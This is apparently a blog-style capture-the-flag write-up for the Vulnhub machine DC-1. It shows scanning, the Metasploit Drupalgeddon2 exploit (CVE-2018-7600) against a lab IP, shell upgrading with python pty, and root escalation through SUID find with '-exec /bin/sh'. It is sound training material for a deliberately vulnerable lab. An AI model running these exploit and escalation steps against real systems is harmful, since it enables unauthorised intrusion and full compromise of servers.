Vulnhub Write-up —DC-1

This is the write-up of the Machine DC-1:1 from Vulnhub.

DIGEST

DC-1 is a beginner friendly machine based on a Linux platform.There is drupal 7 running as a webserver , Using the Drupal 7 exploit we gain the initial shell and by exploit chmod bits to gain the root.

Machine Author: DCAU7
Machine Type: Linux
Machine Level: Beginner

Know-How

  • Nmap
  • Searchsploit

Absorb Skills

  • CVE-2018–7600
  • Drupal Drupalgeddon 2 Forms API Property Injection
  • Linux Privilege Escalation using Find
  • Droopescan

Installation, Networking and Finding the IP

Installation:- I am using Parrot OS as a Host and using the virtual box to install the vulnerable machine(DC-1:1).

Networking:- I am using Bridged Adapter to connect the vulnerable machine and host.

Virtual Box Setting

Finding the IP:-

$netdiscover
man netdiscover

192.168.0.1 is the router IP and 192.168.0.191 is the Host machine

192.168.0.185 is the vulnerable machine , ran a quick nmap scan to confirm it.


Scanning The Network

$nmap -sC -sV 192.168.0.185
man nmap
man result

There is Drupal server running on the PORT 80. Nmap shows the version is l 7, lets confirm with Droopescan.

Droopescan is a python based scanner to help security researcher to find basic risk in the installed version of Drupal.

$droopescan scan drupal -u http://192.168.0.185/
droopescan result

Droopescan give the Possible version 7.22 — 7.26.

$searchsploit drupal 7
man searchsploit
searchsploit result
msf5 >search Drupalgeddon
searching for msf module

Exploitation

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.0.185
RHOSTS => 192.168.0.185
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
meterpreter > sysinfo
msf exploit

Getting the Interactive Shell

$meterpreter > shell
/bin/bash -i

/bin/bash -i give a interactive shell , fancy command from metasploit :D

shell using msf
$meterpreter > shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’

with the help of python pty module we can get the interactive shell.

shell using pty python

There are many ways to get the interactive shell , feel free to comment your way to get the interactive shell. :)


Privilege Escalation

$ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
Snap from above article
Result of SUID bits

find looks different we can execute the command on the result so, lets try this

ls /root gives us the Permission denied but with the help of find /root we can see the files.

find /root
$find /root/thefinalflag.txt -exec cat {} \;
man find
Own the final flag
$find /root/thefinalflag.txt -exec /bin/sh \;

Thanks for reading! If you enjoyed this story, please click the 👏 button and share to help others! Feel free to leave a comment 💬 below. Have feedback? Let’s connect on Twitter.

❤️ by inc0gnito